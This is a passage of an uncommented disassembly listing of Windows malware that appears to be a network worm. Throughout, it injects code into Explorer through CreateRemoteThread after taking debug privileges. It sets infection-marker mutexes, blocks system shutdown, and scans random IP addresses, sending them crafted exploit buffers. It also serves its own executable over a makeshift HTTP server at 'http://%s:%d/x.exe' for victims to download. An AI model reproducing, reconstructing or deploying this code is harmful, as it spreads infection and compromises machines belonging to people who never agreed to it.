push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A0h push offset dword_31424868 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp [ebp+arg_0], 0 jz loc_31421CE7 push 68h lea eax, [ebp+var_89E4] push offset dword_31424A20 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4834] push 1B5Ah push eax lea eax, [ebp+var_897C] push eax call sub_31422CE2 ; memcpy push 70h lea eax, [ebp+var_690C] push offset dword_31424A8C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_37A0] push 0A5Eh push eax lea eax, [ebp+var_689C] push eax call sub_31422CE2 ; memcpy push 84h lea eax, [ebp+var_5DD8] push offset dword_31424B00 push eax call sub_31422CE2 ; memcpy add esp, 3Ch lea eax, [ebp+var_89E4] push 0 push 10FCh push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0FDCh lea eax, [ebp+var_690C] jmp loc_31421D3F ; --------------------------------------------------------------------------- loc_31421BF7: ; CODE XREF: sub_31421801+22Bj push 0DACh lea eax, [ebp+var_2CD8] push 90h push eax mov [ebp+arg_0], 1 call sub_31422CD6 ; memset push 4 lea eax, [ebp+var_24F4] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_24E4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21C0] push offset loc_31424C70 push eax call sub_31422CE2 ; memcpy push 4 lea eax, [ebp+var_21BC] push offset dword_31424BF8 push eax call sub_31422CE2 ; memcpy add esp, 40h push offset byte_314242B8 call sub_31422CDC ; strlen push eax lea eax, [ebp+var_21B0] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 10h xor ecx, ecx lea eax, [ebp+var_4833] loc_31421C93: ; CODE XREF: sub_31421801+4A8j mov dl, [ebp+ecx+var_2CD8] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 0DACh jl short loc_31421C93 and [ebp+var_2CDC], 0 and [ebp+var_2CDB], 0 push 1C52h lea eax, [ebp+var_89E4] push 31h push eax call sub_31422CD6 ; memset push 1C52h lea eax, [ebp+var_690C] push 31h push eax call sub_31422CD6 ; memset add esp, 18h jmp loc_31421A98 ; --------------------------------------------------------------------------- loc_31421CE7: ; CODE XREF: sub_31421801+339j push 7Ch lea eax, [ebp+var_1F28] push offset dword_3142490C push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_F44] push 7D0h push eax lea eax, [ebp+var_1EAC] push eax call sub_31422CE2 ; memcpy push 90h lea eax, [ebp+var_16DC] push offset dword_3142498C push eax call sub_31422CE2 ; memcpy add esp, 24h and [ebp+var_1231], 0 lea eax, [ebp+var_1F28] push 0 push 0CF8h loc_31421D3F: ; CODE XREF: sub_31421801+3F1j push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep and [ebp+var_C], 0 loc_31421D4C: ; CODE XREF: sub_31421801+1ADj ; sub_31421801+1E1j ... push 2 push [ebp+var_4] call dword_31421170 ; shutdown loc_31421D57: ; CODE XREF: sub_31421801+166j push [ebp+var_4] call dword_31421174 ; closesocket pop esi loc_31421D61: ; CODE XREF: sub_31421801+37j mov eax, [ebp+var_C] pop edi pop ebx leave retn sub_31421801 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376p var_1C = dword ptr -1Ch var_18 = byte ptr -18h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 1Ch push esi push edi push offset aAdvapi32 ; "advapi32" call dword_314210A8 ; LoadLibraryA mov esi, dword_314210A4 mov edi, eax push offset aOpenprocesstok ; "OpenProcessToken" push edi call esi ; GetProcAddress test eax, eax mov [ebp+var_4], eax jz short loc_31421DEC push offset aLookupprivileg ; "LookupPrivilegeValueA" push edi call esi ; GetProcAddress test eax, eax mov [ebp+var_8], eax jz short loc_31421DEC push offset aAdjusttokenpri ; "AdjustTokenPrivileges" push edi call esi ; GetProcAddress mov esi, eax test esi, esi jz short loc_31421DEC lea eax, [ebp+var_C] push eax push 20h call dword_314210A0 ; GetCurrentProcess push eax call [ebp+var_4] lea eax, [ebp+var_18] mov [ebp+var_1C], 1 push eax push offset aSedebugprivile ; "SeDebugPrivilege" push 0 mov [ebp+var_10], 2 call [ebp+var_8] push 0 push 0 lea eax, [ebp+var_1C] push 10h push eax push 0 push [ebp+var_C] call esi ; GetProcAddress loc_31421DEC: ; CODE XREF: sub_31421D68+28j ; sub_31421D68+37j ... pop edi pop esi leave retn sub_31421D68 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421DF0 proc near ; CODE XREF: UPX0:3142238Ap var_18 = byte ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 18h mov ecx, dword_31425000 and [ebp+var_4], 0 push ebx push esi mov eax, [ecx+3Ch] push edi add eax, ecx push offset aKernel32 ; "kernel32" mov ecx, [eax+34h] mov edi, [eax+50h] mov [ebp+var_C], ecx call dword_314210B4 ; GetModuleHandleA mov esi, dword_314210A4 mov ebx, eax push offset aVirtualallocex ; "VirtualAllocEx" push ebx call esi ; GetProcAddress test eax, eax mov [ebp+var_10], eax jnz short loc_31421E37 loc_31421E33: ; CODE XREF: sub_31421DF0+54j push 1 jmp short loc_31421E88 ; --------------------------------------------------------------------------- loc_31421E37: ; CODE XREF: sub_31421DF0+41j push offset aCreateremoteth ; "CreateRemoteThread" push ebx call esi ; GetProcAddress test eax, eax mov [ebp+var_14], eax jz short loc_31421E33 push 0 push offset aShell_traywnd ; "Shell_TrayWnd" call dword_31421110 ; FindWindowA test eax, eax jnz short loc_31421E65 call dword_31421114 ; GetForegroundWindow test eax, eax jnz short loc_31421E65 push 2 jmp short loc_31421E88 ; --------------------------------------------------------------------------- loc_31421E65: ; CODE XREF: sub_31421DF0+65j ; sub_31421DF0+6Fj lea ecx, [ebp+var_8] push ecx push eax call dword_31421118 ; GetWindowThreadProcessId push [ebp+var_8] push 0 push 42Ah call dword_314210B0 ; OpenProcess mov ebx, eax test ebx, ebx jnz short loc_31421E8B push 3 loc_31421E88: ; CODE XREF: sub_31421DF0+45j ; sub_31421DF0+73j pop eax jmp short loc_31421EF6 ; --------------------------------------------------------------------------- loc_31421E8B: ; CODE XREF: sub_31421DF0+94j push 4 push 3000h push edi push [ebp+var_C] push ebx call [ebp+var_10] mov esi, dword_3142107C test eax, eax jz short loc_31421EE9 lea ecx, [ebp+var_10] push ecx push edi push eax push eax push ebx call dword_314210AC ; WriteProcessMemory push dword_31424FF4 call esi ; CloseHandle lea eax, [ebp+var_18] xor edi, edi push eax push edi push 1 push [ebp+arg_0] push edi push edi push ebx call [ebp+var_14] cmp eax, edi jz short loc_31421ED5 push eax call esi ; CloseHandle jmp short loc_31421EF0 ; --------------------------------------------------------------------------- loc_31421ED5: ; CODE XREF: sub_31421DF0+DEj push offset aUterm19 ; "uterm19" call sub_31421F29 pop ecx mov [ebp+var_4], 5 jmp short loc_31421EF0 ; --------------------------------------------------------------------------- loc_31421EE9: ; CODE XREF: sub_31421DF0+B2j mov [ebp+var_4], 4 loc_31421EF0: ; CODE XREF: sub_31421DF0+E3j ; sub_31421DF0+F7j push ebx call esi ; CloseHandle mov eax, [ebp+var_4] loc_31421EF6: ; CODE XREF: sub_31421DF0+99j pop edi pop esi pop ebx leave retn sub_31421DF0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421EFB proc near ; CODE XREF: sub_314221C4+Bp ; UPX0:3142234Cp ... var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx push ebx push esi push edi pusha rdtsc mov [ebp+var_8], eax popa mov [ebp+var_4], esp call dword_314210B8 ; GetTickCount mov ecx, [ebp+var_4] imul ecx, [ebp+var_8] add eax, ecx push eax call dword_314210EC ; srand pop ecx pop edi pop esi pop ebx leave retn sub_31421EFB endp ; =============== S U B R O U T I N E ======================================= sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EAp ; UPX0:31422356p ... arg_0 = dword ptr 4 push [esp+arg_0] push 1 push 0 call dword_314210BC ; CreateMutexA retn sub_31421F29 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421F38 proc near ; CODE XREF: sub_314223B2+155p ; sub_314223B2+160p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax xor eax, eax push eax push [ebp+arg_4] push [ebp+arg_0] push eax push eax call dword_314210C0 ; CreateThread pop ebp retn sub_31421F38 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421F52 proc near ; CODE XREF: sub_314221C4+12Cp ; sub_314225C3+5Ap ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax xor eax, eax push eax push [ebp+arg_4] push [ebp+arg_0] push eax push eax call dword_314210C0 ; CreateThread push eax call dword_3142107C ; CloseHandle pop ebp retn sub_31421F52 endp ; =============== S U B R O U T I N E ======================================= sub_31421F73 proc near ; CODE XREF: sub_314211A0+68p ; sub_31422A9B+3Bp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx mov ebx, [esp+4+arg_0] push esi push edi mov edi, [esp+0Ch+arg_4] xor esi, esi test edi, edi jle short loc_31421F9B loc_31421F84: ; CODE XREF: sub_31421F73+26j call dword_314210FC ; rand push 1Ah cdq pop ecx idiv ecx add dl, 61h mov [esi+ebx], dl inc esi cmp esi, edi jl short loc_31421F84 loc_31421F9B: ; CODE XREF: sub_31421F73+Fj and byte ptr [ebx+edi], 0 pop edi pop esi pop ebx retn sub_31421F73 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105p var_54 = dword ptr -54h var_24 = word ptr -24h var_10 = dword ptr -10h var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = word ptr 0Ch push ebp mov ebp, esp sub esp, 54h push esi push edi push 44h xor esi, esi pop edi lea eax, [ebp+var_54] push edi push esi push eax call sub_31422CD6 ; memset mov ax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_24], ax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_54] push eax push esi push esi push esi push esi push esi push esi mov [ebp+var_54], edi push [ebp+arg_0] push esi call dword_314210C4 ; CreateProcessA push [ebp+var_C] mov esi, dword_3142107C mov edi, eax call esi ; CloseHandle push [ebp+var_10] call esi ; CloseHandle mov eax, edi pop edi pop esi leave retn sub_31421FA3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3Ep ; sub_31422712+7p ... var_34 = byte ptr -34h push ebp mov ebp, esp sub esp, 34h lea eax, [ebp+var_34] push 31h push eax call dword_3142114C ; gethostname cmp eax, 0FFFFFFFFh jnz short loc_3142201A call dword_31421150 ; WSAGetLastError xor eax, eax leave retn ; --------------------------------------------------------------------------- loc_3142201A: ; CODE XREF: sub_31421FF9+15j lea eax, [ebp+var_34] push eax call dword_31421154 ; gethostbyname test eax, eax jnz short loc_3142202F mov eax, 100007Fh leave retn ; --------------------------------------------------------------------------- loc_3142202F: ; CODE XREF: sub_31421FF9+2Dj mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] leave retn sub_31421FF9 endp ; =============== S U B R O U T I N E ======================================= sub_31422038 proc near ; CODE XREF: sub_314216A2+12p ; sub_3142255F+22p ... var_4 = byte ptr -4 push ecx lea eax, [esp+4+var_4] push 0 push eax call dword_31421130 ; InternetGetConnectedState neg eax sbb eax, eax neg eax pop ecx retn sub_31422038 endp ; =============== S U B R O U T I N E ======================================= sub_3142204E proc near ; CODE XREF: sub_314223B2+E6p arg_0 = dword ptr 4 push [esp+arg_0] push 0 push 2 call dword_314210CC ; OpenEventA test eax, eax jz short locret_31422067 push eax call dword_314210C8 ; SetEvent locret_31422067: ; CODE XREF: sub_3142204E+10j retn sub_3142204E endp ; =============== S U B R O U T I N E ======================================= sub_31422068 proc near ; CODE XREF: sub_314216A2+68p push esi mov esi, dword_314210FC push edi call esi ; rand mov edi, eax shl edi, 10h call esi ; rand or eax, edi pop edi pop esi retn sub_31422068 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142207E proc near ; DATA XREF: sub_314221C4+127o var_200 = byte ptr -200h var_100 = byte ptr -100h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 200h push ebx mov ebx, [ebp+arg_0] push esi push edi xor edi, edi lea eax, [ebp+var_100] push edi push 100h push eax push ebx call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jnz short loc_314220AF push 1 jmp loc_3142216A ; --------------------------------------------------------------------------- loc_314220AF: ; CODE XREF: sub_3142207E+28j mov esi, dword_31421104 lea eax, [ebp+var_100] push offset aGet ; "GET" push eax call esi ; strstr pop ecx test eax, eax pop ecx jz loc_3142217A lea eax, [ebp+var_100] push offset dword_314241F0 push eax call esi ; strstr pop ecx test eax, eax pop ecx jz loc_3142217A mov esi, dword_31421168 push 0 push 3Dh push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"... push ebx call esi ; send push dword_31424FF0 lea eax, [ebp+var_200] push offset aContentLengthU ; "Content-Length: %u\r\n\r\n" push eax call dword_3142111C ; wsprintfA add esp, 0Ch lea eax, [ebp+var_200] push 0 push eax call sub_31422CDC ; strlen pop ecx push eax lea eax, [ebp+var_200] push eax push ebx call esi ; send loc_3142212C: ; CODE XREF: sub_3142207E+E8j mov eax, dword_31424FF0 mov ecx, 1000h sub eax, edi cmp eax, ecx jb short loc_3142213E mov eax, ecx loc_3142213E: ; CODE XREF: sub_3142207E+BCj test eax, eax jz short loc_3142216D push 0 push eax mov eax, dword_31424FE8 add eax, edi push eax push ebx call esi ; send cmp eax, 0FFFFFFFFh jz short loc_31422168 cmp eax, 1000h jb short loc_3142216D push 64h add edi, eax call dword_31421094 ; Sleep jmp short loc_3142212C ; --------------------------------------------------------------------------- loc_31422168: ; CODE XREF: sub_3142207E+D5j push 2 loc_3142216A: ; CODE XREF: sub_3142207E+2Cj pop eax jmp short loc_314221BD ; --------------------------------------------------------------------------- loc_3142216D: ; CODE XREF: sub_3142207E+C2j ; sub_3142207E+DCj push offset dword_31424FEC call dword_314210D4 ; InterlockedIncrement jmp short loc_31422198 ; --------------------------------------------------------------------------- loc_3142217A: ; CODE XREF: sub_3142207E+49j ; sub_3142207E+61j mov esi, dword_31421168 push 0 push 15h push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n" push ebx call esi ; send push 0 push 3 push offset dword_31424D38 push ebx call esi ; send loc_31422198: ; CODE XREF: sub_3142207E+FAj push 7D0h call dword_31421094 ; Sleep push 2 push ebx call dword_31421170 ; shutdown push ebx call dword_31421174 ; closesocket push 0 call dword_314210D0 ; ExitThread xor eax, eax loc_314221BD: ; CODE XREF: sub_3142207E+EDj pop edi pop esi pop ebx leave retn 4 sub_3142207E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314221C4 proc near ; DATA XREF: sub_314223B2+150o var_130 = byte ptr -130h var_28 = byte ptr -28h var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 130h push ebx push edi call sub_31421EFB lea eax, [ebp+var_130] push 104h push eax push offset aCryptographicS ; "Cryptographic Service" xor ebx, ebx push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h mov dword_31424FEC, ebx call sub_31422882 add esp, 14h test eax, eax jnz loc_314222F9 push esi push ebx push ebx push 3 push ebx push 1 lea eax, [ebp+var_130] push 80000000h push eax call dword_31421080 ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_31422230 push 1 call dword_314210D0 ; ExitThread loc_31422230: ; CODE XREF: sub_314221C4+62j push ebx push esi call dword_314210DC ; GetFileSize push eax mov dword_31424FF0, eax call sub_31422CA5 pop ecx mov dword_31424FE8, eax lea ecx, [ebp+var_4] push ebx push ecx push dword_31424FF0 push eax push esi call dword_314210D8 ; ReadFile mov eax, [ebp+var_4] push esi mov dword_31424FF0, eax call dword_3142107C ; CloseHandle push ebx push 1 push 2 call dword_31421158 ; socket push 10h mov edi, eax pop esi lea eax, [ebp+var_18] push esi push ebx push eax call sub_31422CD6 ; memset add esp, 0Ch mov [ebp+var_18], 2 mov [ebp+var_14], ebx loc_31422292: ; CODE XREF: sub_314221C4+E5j ; sub_314221C4+EDj ... call dword_314210FC ; rand add eax, 7D0h and eax, 1FFFh cmp al, bl mov dword_31424FFC, eax jz short loc_31422292 xor ecx, ecx mov cl, ah test cl, cl jz short loc_31422292 push eax call dword_31421160 ; ntohs mov [ebp+var_16], ax lea eax, [ebp+var_18] push esi push eax push edi call dword_31421140 ; bind test eax, eax jnz short loc_31422292 push 64h push edi call dword_31421144 ; listen mov [ebp+var_8], esi pop esi loc_314222DB: ; CODE XREF: sub_314221C4+133j lea eax, [ebp+var_8] push eax lea eax, [ebp+var_28] push eax push edi call dword_31421148 ; accept push eax push offset sub_3142207E call sub_31421F52 pop ecx pop ecx jmp short loc_314222DB ; --------------------------------------------------------------------------- loc_314222F9: ; CODE XREF: sub_314221C4+3Dj push ebx call dword_314210D0 ; ExitThread pop edi xor eax, eax pop ebx leave retn 4 sub_314221C4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FCp var_190 = byte ptr -190h push ebp mov ebp, esp sub esp, 190h lea eax, [ebp+var_190] push esi mov esi, dword_3142113C push eax push 2 call esi ; WSAStartup lea eax, [ebp+var_190] push eax push 102h call esi ; WSAStartup pop esi leave retn sub_31422308 endp ; --------------------------------------------------------------------------- loc_31422334: ; CODE XREF: UPX1:31427D08j push 0 call dword_314210B4 ; GetModuleHandleA push offset aFtpupd_exe ; "ftpupd.exe" mov dword_31425000, eax call dword_31421074 ; DeleteFileA call sub_31421EFB push offset aUterm19 ; "uterm19" call sub_31421F29 pop ecx mov dword_31424FF4, eax call dword_314210E4 ; RtlGetLastWin32Error cmp eax, 0B7h jnz short loc_31422376 push 1 call dword_314210E0 ; ExitProcess loc_31422376: ; CODE XREF: UPX0:3142236Cj call sub_31421D68 call sub_314229E6 call sub_31422B67 push offset sub_314223B2 call sub_31421DF0 test eax, eax pop ecx jz short loc_3142239B push 0 call sub_314223B2 loc_3142239B: ; CODE XREF: UPX0:31422392j xor eax, eax retn ; =============== S U B R O U T I N E ======================================= sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525p ; sub_3142255F:loc_31422578p ... push 0 push dword_31424FF8 call dword_31421070 ; WaitForSingleObject neg eax sbb eax, eax inc eax retn sub_3142239E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314223B2 proc near ; CODE XREF: UPX0:31422396p ; DATA XREF: UPX0:31422385o var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421190 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 64h push ebx push esi push edi mov [ebp+var_70], offset aU10x ; "u10x" mov [ebp+var_6C], offset aU11x ; "u11x" mov [ebp+var_68], offset aU12x ; "u12x" mov [ebp+var_64], offset aU13x ; "u13x" mov [ebp+var_60], offset aU14x ; "u14x" mov [ebp+var_5C], offset aU15x ; "u15x" mov [ebp+var_58], offset aU16x ; "u16x" mov [ebp+var_54], offset aU17x ; "u17x" mov [ebp+var_50], offset aU18x ; "u18x" mov [ebp+var_4C], offset aU8 ; "u8" mov [ebp+var_48], offset aU9 ; "u9" mov [ebp+var_44], offset aU10 ; "u10" mov [ebp+var_40], offset aU11 ; "u11" mov [ebp+var_3C], offset aU12 ; "u12" mov [ebp+var_38], offset aU13 ; "u13" mov [ebp+var_34], offset aU13i ; "u13i" mov [ebp+var_30], offset aU14 ; "u14" mov [ebp+var_2C], offset aU15 ; "u15" mov [ebp+var_28], offset aU16 ; "u16" mov [ebp+var_24], offset aU17 ; "u17" mov [ebp+var_20], offset aU18 ; "u18" mov [ebp+var_1C], offset aU19 ; "u19" push offset aU19x ; "u19x" xor edi, edi push edi push 1 push edi call dword_3142106C ; CreateEventA mov dword_31424FF8, eax mov [ebp+var_4], edi mov [ebp+var_74], edi loc_3142248B: ; CODE XREF: sub_314223B2+EFj cmp [ebp+var_74], 9 jnb short loc_314224A3 mov eax, [ebp+var_74] push [ebp+eax*4+var_70] call sub_3142204E pop ecx inc [ebp+var_74] jmp short loc_3142248B ; --------------------------------------------------------------------------- loc_314224A3: ; CODE XREF: sub_314223B2+DDj mov [ebp+var_74], edi loc_314224A6: ; CODE XREF: sub_314223B2+10Aj cmp [ebp+var_74], 0Dh jnb short loc_314224BE mov eax, [ebp+var_74] push [ebp+eax*4+var_4C] call sub_31421F29 pop ecx inc [ebp+var_74] jmp short loc_314224A6 ; --------------------------------------------------------------------------- loc_314224BE: ; CODE XREF: sub_314223B2+F8j cmp [ebp+arg_0], edi jz short loc_314224FC push offset aWs2_32 ; "ws2_32" mov esi, dword_314210A8 call esi ; LoadLibraryA push offset aWininet ; "wininet" call esi ; LoadLibraryA push offset aMsvcrt ; "msvcrt" call esi ; LoadLibraryA push offset aAdvapi32 ; "advapi32" call esi ; LoadLibraryA push offset aUser32 ; "user32" call esi ; LoadLibraryA push offset aUterm19 ; "uterm19" call sub_31421F29 pop ecx mov dword_31424FF4, eax loc_314224FC: ; CODE XREF: sub_314223B2+10Fj call sub_31422308 push edi push offset sub_314221C4 call sub_31421F38 push edi push offset sub_314216A2 call sub_31421F38 push edi push offset loc_3142276E call sub_31421F38 add esp, 18h loc_31422525: ; CODE XREF: sub_314223B2+18Ej call sub_3142239E test eax, eax jnz short loc_31422542 push edi call dword_31421018 ; AbortSystemShutdownA push 1388h call dword_31421094 ; Sleep jmp short loc_31422525 ; --------------------------------------------------------------------------- loc_31422542: ; CODE XREF: sub_314223B2+17Aj or [ebp+var_4], 0FFFFFFFFh call nullsub_2 xor eax, eax mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn 4 sub_314223B2 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142255F proc near ; DATA XREF: sub_314225C3+55o ; sub_3142264B+6Ao ... var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_3142256E push 1 pop eax jmp short locret_314225BF ; --------------------------------------------------------------------------- loc_3142256E: ; CODE XREF: sub_3142255F+8j mov al, byte ptr [ebp+arg_0+3] push ebx push esi mov [ebp+var_1], al xor bl, bl loc_31422578: ; CODE XREF: sub_3142255F+5Aj call sub_3142239E test eax, eax jnz short loc_314225BB call sub_31422038 test eax, eax jz short loc_314225BB cmp [ebp+var_1], bl jz short loc_314225B4 mov byte ptr [ebp+arg_0+3], bl push [ebp+arg_0] call sub_31421801 movzx esi, word_3142500C pop ecx call dword_314210FC ; rand cdq idiv esi add edx, esi push edx call dword_31421094 ; Sleep loc_314225B4: ; CODE XREF: sub_3142255F+2Ej inc bl cmp bl, 0FFh jb short loc_31422578 loc_314225BB: ; CODE XREF: sub_3142255F+20j ; sub_3142255F+29j pop esi xor eax, eax pop ebx locret_314225BF: ; CODE XREF: sub_3142255F+Dj leave retn 4 sub_3142255F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314225C3 proc near ; DATA XREF: sub_3142264B+7Eo ; UPX0:31422803o arg_0 = dword ptr 8 push ebp mov ebp, esp cmp byte ptr [ebp+arg_0], 7Fh jnz short loc_314225D1 push 1 pop eax jmp short loc_31422647 ; --------------------------------------------------------------------------- loc_314225D1: ; CODE XREF: sub_314225C3+7j push ebx push esi push edi call sub_31421EFB mov esi, dword_314210FC xor ebx, ebx loc_314225E1: ; CODE XREF: sub_314225C3+7Dj call sub_3142239E test eax, eax jnz short loc_31422642 call sub_31422038 test eax, eax jz short loc_31422642 call esi ; rand mov byte ptr [ebp+arg_0+2], al call esi ; rand push offset dword_31425004 mov byte ptr [ebp+arg_0+3], al call dword_314210D4 ; InterlockedIncrement push [ebp+arg_0] call sub_31421801 test eax, eax pop ecx jnz short loc_31422624 push [ebp+arg_0] push offset sub_3142255F call sub_31421F52 pop ecx pop ecx loc_31422624: ; CODE XREF: sub_314225C3+50j movzx edi, word_3142500C call esi ; rand cdq idiv edi add edx, edi push edx call dword_31421094 ; Sleep inc ebx cmp ebx, 8000h jl short loc_314225E1 loc_31422642: ; CODE XREF: sub_314225C3+25j ; sub_314225C3+2Ej pop edi pop esi xor eax, eax pop ebx loc_31422647: ; CODE XREF: sub_314225C3+Cj pop ebp retn 4 sub_314225C3 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142264B proc near ; DATA XREF: UPX0:3142281Bo var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push ecx call sub_31421EFB call sub_3142239E test eax, eax jnz loc_31422704 push ebx mov ebx, dword_31421094 push esi mov esi, dword_314210FC push edi loc_31422671: ; CODE XREF: sub_3142264B+48j ; sub_3142264B+B0j call esi ; rand mov byte ptr [ebp+var_4+1], al call esi ; rand mov byte ptr [ebp+var_4+3], al call esi ; rand mov byte ptr [ebp+var_4+2], al loc_31422680: ; CODE XREF: sub_3142264B+3Cj call esi ; rand cmp al, 7Fh mov byte ptr [ebp+var_4], al jz short loc_31422680 call sub_31421FF9 mov edi, [ebp+var_4] cmp edi, eax jz short loc_31422671 call sub_31422038 test eax, eax jz short loc_314226DC push offset dword_31425004 call dword_314210D4 ; InterlockedIncrement push edi call sub_31421801 test eax, eax pop ecx jnz short loc_314226E3 push edi push offset sub_3142255F call sub_31421F52 pop ecx mov [ebp+var_8], 4 pop ecx loc_314226C8: ; CODE XREF: sub_3142264B+8Dj push edi push offset sub_314225C3 call sub_31421F52 dec [ebp+var_8] pop ecx pop ecx jnz short loc_314226C8 jmp short loc_314226E3 ; --------------------------------------------------------------------------- loc_314226DC: ; CODE XREF: sub_3142264B+51j push 2710h call ebx ; Sleep loc_314226E3: ; CODE XREF: sub_3142264B+67j ; sub_3142264B+8Fj movzx edi, word_3142500C call esi ; rand cdq idiv edi add edx, edi push edx call ebx ; Sleep call sub_3142239E test eax, eax jz loc_31422671 pop edi pop esi pop ebx loc_31422704: ; CODE XREF: sub_3142264B+11j push 0 call dword_314210D0 ; ExitThread xor eax, eax leave retn 4 sub_3142264B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422712 proc near ; CODE XREF: UPX0:314227E0p ; UPX0:loc_31422846p var_50 = byte ptr -50h var_28 = byte ptr -28h push ebp mov ebp, esp sub esp, 50h push esi call sub_31421FF9 push eax call dword_3142115C ; inet_ntoa mov esi, dword_31421068 push eax lea eax, [ebp+var_28] push eax call esi ; lstrcpyA push dword_31424FFC lea eax, [ebp+var_28] push eax lea eax, [ebp+var_50] push offset aHttpSDX_exe ; "http://%s:%d/x.exe" push eax call dword_3142111C ; wsprintfA add esp, 10h lea eax, [ebp+var_50] push eax push offset word_314242BA call esi ; lstrcpyA push offset byte_314242B8 call dword_31421084 ; lstrlenA mov byte_314242B8[eax], 0DFh pop esi leave retn sub_31422712 endp ; --------------------------------------------------------------------------- loc_3142276E: ; DATA XREF: sub_314223B2+166o push ecx push ecx push ebx push ebp push esi xor ebx, ebx push edi mov dword_31425004, ebx call sub_31422038 mov esi, dword_31421094 mov edi, 1388h test eax, eax jnz short loc_3142279C loc_31422790: ; CODE XREF: UPX0:3142279Aj push edi call esi ; Sleep call sub_31422038 test eax, eax jz short loc_31422790 loc_3142279C: ; CODE XREF: UPX0:3142278Ej lea eax, [esp+14h] push ebx push eax call dword_31421130 ; InternetGetConnectedState test byte ptr [esp+14h], 2 push 50h mov dword_31425008, ebx pop ebp mov word_3142500C, 96h jz short loc_314227D9 mov dword_31425008, 1 mov ebp, 15Eh mov word_3142500C, 14h loc_314227D9: ; CODE XREF: UPX0:314227BFj call 